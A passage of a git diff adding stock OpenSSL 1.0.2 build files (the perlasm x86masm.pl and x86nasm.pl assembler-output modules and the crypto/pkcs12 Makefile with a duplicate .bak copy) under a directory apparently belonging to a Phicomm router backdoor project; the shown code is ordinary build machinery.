+    {	$idx!=0 or $idx=1;
+	$ret .= "$reg2*$idx";
+	$ret .= "+$reg1" if ($reg1 ne "");
+    }
+    else
+    {	$ret .= "$reg1";   }
+
+    $ret .= "$post]";
+    $ret =~ s/\+\]/]/; # in case $addr was the only argument
+    $ret =~ s/\[\s*\]//;
+
+  $ret;
+}
+sub ::BP	{ &get_mem("BYTE",@_);  }
+sub ::WP	{ &get_mem("WORD",@_);	}
+sub ::DWP	{ &get_mem("DWORD",@_); }
+sub ::QWP	{ &get_mem("QWORD",@_); }
+sub ::BC	{ "@_";  }
+sub ::DWC	{ "@_"; }
+
+sub ::file
+{ my $tmp=<<___;
+TITLE	$_[0].asm
+IF \@Version LT 800
+ECHO MASM version 8.00 or later is strongly recommended.
+ENDIF
+.486
+.MODEL	FLAT
+OPTION	DOTNAME
+IF \@Version LT 800
+.text\$	SEGMENT PAGE 'CODE'
+ELSE
+.text\$	SEGMENT ALIGN(64) 'CODE'
+ENDIF
+___
+    push(@out,$tmp);
+    $segment = ".text\$";
+}
+
+sub ::function_begin_B
+{ my $func=shift;
+  my $global=($func !~ /^_/);
+  my $begin="${::lbdecor}_${func}_begin";
+
+    &::LABEL($func,$global?"$begin":"$nmdecor$func");
+    $func="ALIGN\t16\n".$nmdecor.$func."\tPROC";
+
+    if ($global)    { $func.=" PUBLIC\n${begin}::\n"; }
+    else	    { $func.=" PRIVATE\n";            }
+    push(@out,$func);
+    $::stack=4;
+}
+sub ::function_end_B
+{ my $func=shift;
+
+    push(@out,"$nmdecor$func ENDP\n");
+    $::stack=0;
+    &::wipe_labels();
+}
+
+sub ::file_end
+{ my $xmmheader=<<___;
+.686
+.XMM
+IF \@Version LT 800
+XMMWORD STRUCT 16
+DQ	2 dup (?)
+XMMWORD	ENDS
+ENDIF
+___
+    if (grep {/\b[x]?mm[0-7]\b/i} @out) {
+	grep {s/\.[3-7]86/$xmmheader/} @out;
+    }
+
+    push(@out,"$segment	ENDS\n");
+
+    if (grep {/\b${nmdecor}OPENSSL_ia32cap_P\b/i} @out)
+    {	my $comm=<<___;
+.bss	SEGMENT 'BSS'
+COMM	${nmdecor}OPENSSL_ia32cap_P:DWORD:4
+.bss	ENDS
+___
+	# comment out OPENSSL_ia32cap_P declarations
+	grep {s/(^EXTERN\s+${nmdecor}OPENSSL_ia32cap_P)/\;$1/} @out;
+	push (@out,$comm);
+    }
+    push (@out,$initseg) if ($initseg);
+    push (@out,"END\n");
+}
+
+sub ::comment {   foreach (@_) { push(@out,"\t; $_\n"); }   }
+
+*::set_label_B = sub
+{ my $l=shift; push(@out,$l.($l=~/^\Q${::lbdecor}\E[0-9]{3}/?":\n":"::\n")); };
+
+sub ::external_label
+{   foreach(@_)
+    {	push(@out, "EXTERN\t".&::LABEL($_,$nmdecor.$_).":NEAR\n");   }
+}
+
+sub ::public_label
+{   push(@out,"PUBLIC\t".&::LABEL($_[0],$nmdecor.$_[0])."\n");   }
+
+sub ::data_byte
+{   push(@out,("DB\t").join(',',@_)."\n");	}
+
+sub ::data_short
+{   push(@out,("DW\t").join(',',@_)."\n");	}
+
+sub ::data_word
+{   push(@out,("DD\t").join(',',@_)."\n");	}
+
+sub ::align
+{   push(@out,"ALIGN\t$_[0]\n");	}
+
+sub ::picmeup
+{ my($dst,$sym)=@_;
+    &::lea($dst,&::DWP($sym));
+}
+
+sub ::initseg
+{ my $f=$nmdecor.shift;
+
+    $initseg.=<<___;
+.CRT\$XCU	SEGMENT DWORD PUBLIC 'DATA'
+EXTERN	$f:NEAR
+DD	$f
+.CRT\$XCU	ENDS
+___
+}
+
+sub ::dataseg
+{   push(@out,"$segment\tENDS\n_DATA\tSEGMENT\n"); $segment="_DATA";   }
+
+sub ::safeseh
+{ my $nm=shift;
+    push(@out,"IF \@Version GE 710\n");
+    push(@out,".SAFESEH	".&::LABEL($nm,$nmdecor.$nm)."\n");
+    push(@out,"ENDIF\n");
+}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86nasm.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86nasm.pl
new file mode 100644
index 0000000..5d92f60
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86nasm.pl
@@ -0,0 +1,179 @@
+#!/usr/bin/env perl
+
+package x86nasm;
+
+*out=\@::out;
+
+$::lbdecor="L\$";		# local label decoration
+$nmdecor=$::netware?"":"_";	# external name decoration
+$drdecor=$::mwerks?".":"";	# directive decoration
+
+$initseg="";
+
+sub ::generic
+{ my $opcode=shift;
+  my $tmp;
+
+    if (!$::mwerks)
+    {   if    ($opcode =~ m/^j/o && $#_==0) # optimize jumps
+	{   $_[0] = "NEAR $_[0]";   	}
+	elsif ($opcode eq "lea" && $#_==1)  # wipe storage qualifier from lea
+	{   $_[1] =~ s/^[^\[]*\[/\[/o;	}
+	elsif ($opcode eq "clflush" && $#_==0)
+	{   $_[0] =~ s/^[^\[]*\[/\[/o;	}
+    }
+    &::emit($opcode,@_);
+  1;
+}
+#
+# opcodes not covered by ::generic above, mostly inconsistent namings...
+#
+sub ::call	{ &::emit("call",(&::islabel($_[0]) or "$nmdecor$_[0]")); }
+sub ::call_ptr	{ &::emit("call",@_);	}
+sub ::jmp_ptr	{ &::emit("jmp",@_);	}
+
+sub get_mem
+{ my($size,$addr,$reg1,$reg2,$idx)=@_;
+  my($post,$ret);
+
+    if (!defined($idx) && 1*$reg2) { $idx=$reg2; $reg2=$reg1; undef $reg1; }
+
+    if ($size ne "")
+    {	$ret .= "$size";
+	$ret .= " PTR" if ($::mwerks);
+	$ret .= " ";
+    }
+    $ret .= "[";
+
+    $addr =~ s/^\s+//;
+    # prepend global references with optional underscore
+    $addr =~ s/^([^\+\-0-9][^\+\-]*)/::islabel($1) or "$nmdecor$1"/ige;
+    # put address arithmetic expression in parenthesis
+    $addr="($addr)" if ($addr =~ /^.+[\-\+].+$/);
+
+    if (($addr ne "") && ($addr ne 0))
+    {	if ($addr !~ /^-/)	{ $ret .= "$addr+"; }
+	else			{ $post=$addr;      }
+    }
+
+    if ($reg2 ne "")
+    {	$idx!=0 or $idx=1;
+	$ret .= "$reg2*$idx";
+	$ret .= "+$reg1" if ($reg1 ne "");
+    }
+    else
+    {	$ret .= "$reg1";   }
+
+    $ret .= "$post]";
+    $ret =~ s/\+\]/]/; # in case $addr was the only argument
+
+  $ret;
+}
+sub ::BP	{ &get_mem("BYTE",@_);  }
+sub ::DWP	{ &get_mem("DWORD",@_); }
+sub ::WP	{ &get_mem("WORD",@_);	}
+sub ::QWP	{ &get_mem("",@_);      }
+sub ::BC	{ (($::mwerks)?"":"BYTE ")."@_";  }
+sub ::DWC	{ (($::mwerks)?"":"DWORD ")."@_"; }
+
+sub ::file
+{   if ($::mwerks)	{ push(@out,".section\t.text,64\n"); }
+    else
+    { my $tmp=<<___;
+%ifidn __OUTPUT_FORMAT__,obj
+section	code	use32 class=code align=64
+%elifidn __OUTPUT_FORMAT__,win32
+\$\@feat.00 equ 1
+section	.text	code align=64
+%else
+section	.text	code
+%endif
+___
+	push(@out,$tmp);
+    }
+}
+
+sub ::function_begin_B
+{ my $func=shift;
+  my $global=($func !~ /^_/);
+  my $begin="${::lbdecor}_${func}_begin";
+
+    $begin =~ s/^\@/./ if ($::mwerks);	# the torture never stops
+
+    &::LABEL($func,$global?"$begin":"$nmdecor$func");
+    $func=$nmdecor.$func;
+
+    push(@out,"${drdecor}global	$func\n")	if ($global);
+    push(@out,"${drdecor}align	16\n");
+    push(@out,"$func:\n");
+    push(@out,"$begin:\n")			if ($global);
+    $::stack=4;
+}
+
+sub ::function_end_B
+{   $::stack=0;
+    &::wipe_labels();
+}
+
+sub ::file_end
+{   if (grep {/\b${nmdecor}OPENSSL_ia32cap_P\b/i} @out)
+    {	my $comm=<<___;
+${drdecor}segment	.bss
+${drdecor}common	${nmdecor}OPENSSL_ia32cap_P 16
+___
+	# comment out OPENSSL_ia32cap_P declarations
+	grep {s/(^extern\s+${nmdecor}OPENSSL_ia32cap_P)/\;$1/} @out;
+	push (@out,$comm)
+    }
+    push (@out,$initseg) if ($initseg);		
+}
+
+sub ::comment {   foreach (@_) { push(@out,"\t; $_\n"); }   }
+
+sub ::external_label
+{   foreach(@_)
+    {	push(@out,"${drdecor}extern\t".&::LABEL($_,$nmdecor.$_)."\n");   }
+}
+
+sub ::public_label
+{   push(@out,"${drdecor}global\t".&::LABEL($_[0],$nmdecor.$_[0])."\n");  }
+
+sub ::data_byte
+{   push(@out,(($::mwerks)?".byte\t":"db\t").join(',',@_)."\n");	}
+sub ::data_short
+{   push(@out,(($::mwerks)?".word\t":"dw\t").join(',',@_)."\n");	}
+sub ::data_word
+{   push(@out,(($::mwerks)?".long\t":"dd\t").join(',',@_)."\n");	}
+
+sub ::align
+{   push(@out,"${drdecor}align\t$_[0]\n");	}
+
+sub ::picmeup
+{ my($dst,$sym)=@_;
+    &::lea($dst,&::DWP($sym));
+}
+
+sub ::initseg
+{ my $f=$nmdecor.shift;
+    if ($::win32)
+    {	$initseg=<<___;
+segment	.CRT\$XCU data align=4
+extern	$f
+dd	$f
+___
+    }
+}
+
+sub ::dataseg
+{   if ($mwerks)	{ push(@out,".section\t.data,4\n");   }
+    else		{ push(@out,"section\t.data align=4\n"); }
+}
+
+sub ::safeseh
+{ my $nm=shift;
+    push(@out,"%if	__NASM_VERSION_ID__ >= 0x02030000\n");
+    push(@out,"safeseh	".&::LABEL($nm,$nmdecor.$nm)."\n");
+    push(@out,"%endif\n");
+}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile
new file mode 100644
index 0000000..7309b1a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile
@@ -0,0 +1,263 @@
+#
+# OpenSSL/crypto/pkcs12/Makefile
+#
+
+DIR=	pkcs12
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= p12_add.c p12_asn.c p12_attr.c p12_crpt.c p12_crt.c p12_decr.c \
+	p12_init.c p12_key.c p12_kiss.c p12_mutl.c\
+	p12_utl.c p12_npas.c pk12err.c p12_p8d.c p12_p8e.c
+LIBOBJ= p12_add.o p12_asn.o p12_attr.o p12_crpt.o p12_crt.o p12_decr.o \
+	p12_init.o p12_key.o p12_kiss.o p12_mutl.o\
+	p12_utl.o p12_npas.o pk12err.o p12_p8d.o p12_p8e.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  pkcs12.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+p12_add.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_add.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_add.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_add.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_add.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_add.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_add.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_add.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_add.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_add.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_add.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_add.o: ../cryptlib.h p12_add.c
+p12_asn.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_asn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+p12_asn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_asn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_asn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_asn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_asn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p12_asn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+p12_asn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p12_asn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_asn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_asn.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_asn.c
+p12_attr.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_attr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_attr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_attr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_attr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_attr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_attr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_attr.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_attr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_attr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_attr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_attr.o: ../cryptlib.h p12_attr.c
+p12_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_crpt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_crpt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_crpt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_crpt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_crpt.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_crpt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_crpt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_crpt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_crpt.o: ../cryptlib.h p12_crpt.c
+p12_crt.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_crt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_crt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_crt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_crt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_crt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_crt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_crt.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_crt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_crt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_crt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_crt.o: ../cryptlib.h p12_crt.c
+p12_decr.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_decr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_decr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_decr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_decr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_decr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_decr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_decr.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_decr.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_decr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_decr.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_decr.o: ../cryptlib.h p12_decr.c
+p12_init.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_init.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_init.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_init.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_init.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_init.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_init.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_init.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_init.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_init.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_init.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_init.o: ../cryptlib.h p12_init.c
+p12_key.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_key.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+p12_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_key.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_key.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_key.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p12_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+p12_key.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p12_key.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_key.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_key.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_key.c
+p12_kiss.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_kiss.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_kiss.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_kiss.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_kiss.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_kiss.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_kiss.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_kiss.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_kiss.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_kiss.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_kiss.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_kiss.o: ../cryptlib.h p12_kiss.c
+p12_mutl.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_mutl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_mutl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_mutl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_mutl.o: ../../include/openssl/hmac.h ../../include/openssl/lhash.h
+p12_mutl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_mutl.o: ../../include/openssl/opensslconf.h
+p12_mutl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_mutl.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_mutl.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+p12_mutl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p12_mutl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p12_mutl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p12_mutl.c
+p12_npas.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p12_npas.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p12_npas.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p12_npas.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p12_npas.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p12_npas.o: ../../include/openssl/opensslconf.h
+p12_npas.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_npas.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+p12_npas.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_npas.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_npas.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_npas.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_npas.o: p12_npas.c
+p12_p8d.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_p8d.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_p8d.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_p8d.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_p8d.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_p8d.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_p8d.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_p8d.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_p8d.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_p8d.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_p8d.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_p8d.o: ../cryptlib.h p12_p8d.c
+p12_p8e.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_p8e.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_p8e.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_p8e.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_p8e.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_p8e.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_p8e.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_p8e.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_p8e.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_p8e.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_p8e.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_p8e.o: ../cryptlib.h p12_p8e.c
+p12_utl.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_utl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_utl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_utl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_utl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_utl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p12_utl.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+p12_utl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p12_utl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p12_utl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p12_utl.o: ../cryptlib.h p12_utl.c
+pk12err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pk12err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pk12err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk12err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk12err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk12err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pk12err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+pk12err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk12err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk12err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk12err.o: ../../include/openssl/x509_vfy.h pk12err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.bak
new file mode 100644
index 0000000..7309b1a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/Makefile.bak
@@ -0,0 +1,263 @@
+#
+# OpenSSL/crypto/pkcs12/Makefile
+#
+
+DIR=	pkcs12
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= p12_add.c p12_asn.c p12_attr.c p12_crpt.c p12_crt.c p12_decr.c \
+	p12_init.c p12_key.c p12_kiss.c p12_mutl.c\
+	p12_utl.c p12_npas.c pk12err.c p12_p8d.c p12_p8e.c
+LIBOBJ= p12_add.o p12_asn.o p12_attr.o p12_crpt.o p12_crt.o p12_decr.o \
+	p12_init.o p12_key.o p12_kiss.o p12_mutl.o\
+	p12_utl.o p12_npas.o pk12err.o p12_p8d.o p12_p8e.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  pkcs12.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+p12_add.o: ../../e_os.h ../../include/openssl/asn1.h
+p12_add.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p12_add.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p12_add.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p12_add.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p12_add.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p12_add.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
